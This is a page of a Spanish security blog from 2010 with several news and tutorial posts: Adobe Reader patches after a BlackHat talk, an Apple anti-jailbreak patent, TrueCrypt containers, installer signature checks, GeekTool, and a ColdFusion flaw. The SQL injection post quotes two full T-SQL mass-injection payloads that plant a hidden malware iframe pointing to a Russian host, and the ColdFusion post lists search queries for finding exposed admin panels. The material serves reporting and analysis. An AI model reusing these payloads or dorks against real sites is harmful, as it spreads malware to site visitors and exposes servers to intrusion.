Las conferencias BlackHat siempre son un cúmulo de noticias y un cúmulo de trabajo para todas las compañías que acaban apareciendo, de una u otra manera, en las presentaciones de los ponentes. Y Adobe lleva una buena temporada.

En esta ocasión fue Charlie Miller, uno de los investigadores de seguridad más importantes del mundo, famoso por sus exploits para Safari, I-Phones, etcétera, quién puso en aprietos a Adobe en su presentación. No es que su charla fuera sobre como explotar vulnerabilidades en Adobe o como saltarse alguna protección, sino que presentaba una herramienta que ha desarrollado para el análisis automático de "crahses" en aplicaciones. Es decir, que le ayuda, de forma automática, a descubrir la vulnerabilidad cuando una aplicación falla.

Los procesos de búsqueda de vulnerabilidades se han automatizado en muchas de sus partes. Hasta ahora, el proceso comienza con la generación de un fallo de la aplicación, o crash, mediante técnicas de fuzzing. Estas técnicas están focalizadas en generar la mayor cantidad de parámetros de entrada posible, con valores aleatorizados que son inyectados en las aplicaciones buscando errores no controlados. Cuando un conjunto de estos datos de entrada genera un error en la aplicación es cuando se pasa a analizar ese caso concreto en busca del fallo.

Charlie Miller, con Bitblaze automatiza esta segunda fase. Así, en las conferencias de BlackHat hizo unos demos con, entre otros Acrobat Reader [paginas 36 a 57 del whitepaper de BitBlaze]. Estas "demos" han generado la creación de dos expedientes de seguridad, catalogados como CVE-2010-2862 y CVE-2010-1240 y la publicación por parte de Adobe de un Advisory de Seguridad.

Junto con el advisory, Adobe ha sacado la versión 9.3.4 de Acrobat Reader para Mac OS, para Windows y para sistemas Unix. Puede ser instalada mediante parche incremental o instalación completa.

Lo dicho, trabajo para Adobe tras las conferencias de BlackHat.... y ahora para todos los usuarios y administradores de sistemas, pero mejor esto, a que exista una vulnerabilidad que no se conozca en el sistema.

viernes, 20 de agosto de 2010

Apple planea detectar, y tal vez bloquear, los dispositivos con jailbreak, unlock o alterados

Así es como está viendo el mundo la patente que ha solicitado Apple de un sistema para diferenciar entre usuarios "Autorizados" y "NO Autorizados" para utilizar un determinado sistema electrónico.


La patente, titulada "Systems and Methods for Identifying Unauthorized Users of an Electronic Device", que fue solicitada en Febrero, describe mecanismos para cambiar la configuración del dispositivo o, incluso, enviar información desde ellos en situaciones no autorizadas, tal y como, por ejemplo, cita en el punto 4:

4. The method of claim 3, wherein the particular activity comprises one or more of hacking the electronic device, jailbreaking the electronic device, unlocking the electronic device, removing a SIM card from the electronic device, and moving at least a predetermined distance away from a synced device.

Parece ser que Apple ya ha estado realizando pruebas con ajustes de configuraciones individuales y podría, tal y como se explica en Apple Insider, reconocer a los usuarios que hayan hecho jailbreak o unlock del dispositivo y modificarles el funcionamiento del mismo.

Habrá que leerse con cuidado las próximos contratos de licencia que lleven los dispositivos Apple.

Contenedores de ficheros seguros mediante TrueCrypt

Es bien conocido que una de las mejores aplicaciones que existen hoy en día para el cifrado de particiones o contenedores es TrueCrypt, disponible su descarga desde el siguiente enlace: Descargar TrueCrypt. TrueCrypt permite a un usuario la creación de contenedores de un tamaño específico donde podrá almacenar información sensible totalmente segura.

Como en todo este tipo de herramientas donde el encargado de asegurar la confidencialidad e integridad de los datos es el cifrado simétrico, es necesario la elección de una clave que se considere lo suficientemente robusta.

Una vez descargada la aplicación e instalada en el Sistema Operativo pasaremos a ejecutarla, donde observaremos la siguiente pantalla.


Nuestro objetivo principal es la de crear un contenedor de ficheros que nos permita guardar de forma segura archivos. Por lo tanto, pulsaremos sobre el botón de Create Volumen.

Acto seguido la aplicación nos presentará una serie de pantallas de configuración para crear el volumen. En la primera nos dará a elegir entre crear un contenedor de ficheros cifrado y crear un volumen cifrado. Se elegirá la primera opción como ya se ha comentado anteriormente.

En la segunda pantalla nos dará a elegir entre un volumen estándar o un volumen oculto. Se elegirá un volumen Standard.


En la tercera pantalla únicamente se ha de asignar el nombre del volumen a crear. La cuarta pantalla nos da la opción de elegir el modo de cifrado asimétrico (AES, Serpent, Twofish, AES + Twofish, AES + twofish + Serpent, Serpent + AES, Serpent + Twofish + AES y Twofish + Serpent), donde se elegirá únicamente el cifrado asimétrico AES. Por otro lado, también nos ofrece la posibilidad de elegir el Algoritmo de Hash (RIPEMD-160, SHA-512 y Whirlpool), donde se elegirá el Algoritmo SHA-512.


En las dos siguientes se nos dará a elegir el tamaño del volumen de la partición y el password que se va a utilizar para descifrarlo. Cabe recordar que la robustez del cifrado depende de la clave como ya se ha comentado anteriormente.


La siguiente pantalla nos permitirá elegir el tipo de formato del archivo. Y por último, pulsando sobre el botón Format se pasará a crear el contenedor cifrado.


Una vez finalizada la creación correctamente del contenedor, se pasará a montar este seleccionando el fichero que nos haya creado la aplicación e introduciendo la contraseña que asignamos al construir el contenedor.



Acto seguido de introducir el password se montará el contenedor en nuestro sistema y se podrá acceder directamente a él haciendo doble click sobre la lista que nos aparece en la parte superior de la ventana.


Ahora ya podremos almacenar todos nuestros ficheros confidenciales en nuestro contenedor cifrado sin miedo a que nadie los pueda leer o visualizar. Por último, solo tendremos que desmontar el fichero mediante botón derecho sobre la lista y pulsando sobre Dismount.

Esperamos que esta información os haya servido de ayuda.

Un Saludo!!

jueves, 19 de agosto de 2010

Apple.com afectado por un ataque masivo de SQL Injection utilizado para distribuir malware

Durante el análisis del impacto que un ataque automático había producido en las empresas se ha descubierto que ha infectado varias páginas de Apple.com. Este tipo de ataques se aprovechan de encontrar de forma masiva sitios vulnerables a ataques conocidos - ya sean vulnerabilidades SQL Injection, vulnerabilidades RFI en productos web o incluso el último fallo de ColdFusion - a través de los buscadores, para automatizar ataques de infección.

En este caso, como informa The Register, el ataque ha afectado a más de 538.000 páginas que se han visto infectadas con un script en un iframe que se utiliza para descargar malware. En la siguiente imagen puede verse como los sitios de Apple.com están infectados e indexados en Google.


Manuel Humberto Santander Peláez de SANS ha hecho un análisis del exploit. Las dos mutaciones del ataque, una vez des-ofuscadas, muestran como están basadas en explotar vulnerabilidades en aplicaciones web que trabajan contra bases de datos SQL Server:

Ataque 1

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))')
FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor


Dentro del CAST se inyecta:

[iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"][/iframe]

Es decir, un frame oculto que distribuye malware. El ataque 2 es similar

Ataque 2

declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR

Una vez más, a pesar de la cantidad de años que hace que se conocen las vulnerabilidades SQL Injection, un atacante hace un uso exitoso de ellas.

miércoles, 18 de agosto de 2010

Actualizaciones de seguridad "seguras" para QuickTime e ITunes para Windows

Dos de los productos más populares de Apple para los sistemas Windows se han visto afectados por sendas vulnerabilidades críticas, que han sido solucionadas con la publicación de dos nuevas versiones de ellos.

Aunque en muchos medios de comunicación se ha hecho más foco en las nuevas funcionalidades de estas versiones, no hay que olvidar que esta actualización del producto no debe ser opcional desde el punto de seguridad pues ambos fallos tienen una alta criticidad y hay suficiente información pública como para que se pueda realizar ingeniería inversa del producto y que aparezcan exploits activos en Internet.

Las vulnerabilidades han sido reconocidas por Apple tanto en QuickTime [KB-HT4290] como en ITunes [KB-HT4105]. De este último hay un advisory por parte de la empresa que la reportó explicando el funcionamiento y el vector de ataque: ACROS Security ITunes Advisory.

Si se está utilizando algún software de comprobación de actualizaciones de seguridad y vulnerabilidades de productos, como Secunia PSI, los usuarios también habrán recibido la alerta de seguridad

Actualización segura de los productos

Hay que recordar que actualmente, tanto ITunes como QuickTime, son productos de instalación completa, por lo que es necesario descargarse el producto completo, por lo que habrá que descargarse un programa instalador. Este proceso puede ser interceptado por un atacante mediante un ataque de hombre en medio "Man in the Middle" y hacer una sustitución del archivo por un troyano en lugar de la actualización de seguridad. Por ello, es conveniente comprobar el software antes de instalarlo.

Ambos programas de Apple vienen firmados digitalmente, por lo que se puede comprobar la firma que acompaña al programa de instalación antes de ejecutarlos. Basta con hacer clic con el botón derecho sobre el archivo instalador y en el menú contextual seleccionar la opción de Propiedades. Una vez allí en la pestaña Firmas Digitales se deberá ver que aparece la firma de Apple.


Entrando en el cuadro de diálogo Detalles se podrá ver quién ha firmado el archivo. Como se puede apreciar, tanto en esta imagen, como en los detalles del certificado, la firma la ha realizado Apple Inc. y el certificado de Apple ha sido emitido por Verisign.


Si el fichero no aparece firmado, o viene firmado con cualquier otro certificado digital, se recomienda no ejecutar la instalación de ningún modo y se recomienda descargar el fichero desde una red segura.

GeekTool: Seguridad visual

En el mundo de la seguridad de la información, en muchos casos es necesaria la visualización tanto estática como en tiempo real de ficheros que muestren información relevante de nuestro sistema.

En el siguiente post se va a realizar una introducción de las funcionalidades que nos ofrece la aplicación GeekTool. Dicha herramienta permite al usuario final incrustar paneles en el fondo del escritorio pudiendo asígnales imágenes, ficheros del sistema e incluso la propia Shell del Sistema Operativo.

En el siguiente ejemplo se creará una serie de paneles que nos permita visualizar en todo momento los ficheros de Log de nuestro sistema y el estado de un directorio.

Una vez descargada la aplicación GeekTool y montado el DMG, pasaremos a la instalación de la herramienta. Al finalizar la ésta, se agregará un nuevo ítem en las preferencias del sistema que posteriormente nos permitirá configurar cada uno de los paneles.


Si pasamos a ejecutar la aplicación, tendremos la oportunidad de agregar diferentes paneles (File, Image, Shell) y posteriormente asignarle una serie de propiedades.


Para colocar un panel en nuestro escritorio, arrastraremos el icono File sobre él, pudiendo redimensionarlo y dándole la forma que se crea más conveniente. El icono Shell incorporará una Shell a nuestro escritorio, en la cual podremos ejecutar comandos en cualquier momento. Por último el icono Image nos permite colocar imágenes de URL’s externas en nuestro fondo de escritorio.

Una vez tenemos un panel File colocado sobre el escritorio, el cuadro Properties nos permite escoger el fichero (en nuestro caso un fichero de log) que queramos que se visualice en segundo plano.


GeekTool actualmente se encuentra en su versión 3.0 y es posible descargarla desde la web oficial del proyecto.

Desde Seguridad Apple deseamos que a los más Geek os resulte útil esta herramienta.

martes, 17 de agosto de 2010

Seria vulnerabilidad en ColdFusion. Exploit público

ColdFusion es una tecnología de desarrollo de aplicaciones en servidores Web que Adobe adquirió tras la compra de la antigua Macromedia. Esta tecnología se puede utilizar en servidores Mac OS X, al igual que en servidores Windows y Linux/UNIX.

Esta semana pasada se hizo pública una vulnerabilidad que permitía realizar ataque de Directory Transversal en servidores ColdFusion, es decir, vagabundear por el sistema de ficheros. Los servidores son fácilmente encontrables a través de sencillas búsquedas en Google como:

- CFIDE "adminapi"
- CFIDE "Administrator"
- CFIDE "ComponentUtils"
- CFIDE "Wizards"


Sin embargo, el problema va mucho más allá. Al haberse descubierto el acceso a estos directorios, también se ha descubierto que muchos de ellos no están protegidos con listas de control de acceso, lo que permite a cualquier usuario la posibilidad de subir ficheros.

Adobe no se ha tomado a la ligera la vulnerabilidad y la ha catalogado de importante, solicitando por favor que todos los que tengan instalada una versión vulnerable, a saber: ColdFusion 8.0, 8.0.1, 9.0, 9.0.1 para Windows, Macintosh and UNIX, que por favor instalen el Hotfix que han publicado.

La creación del exploit no se ha hecho esperar y ya en exploit-db se encuentra publicada una versión funcional para sacar partido de esta vulnerabilidad. Si tienes ColdFusion, ¡actualizalo ya!

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares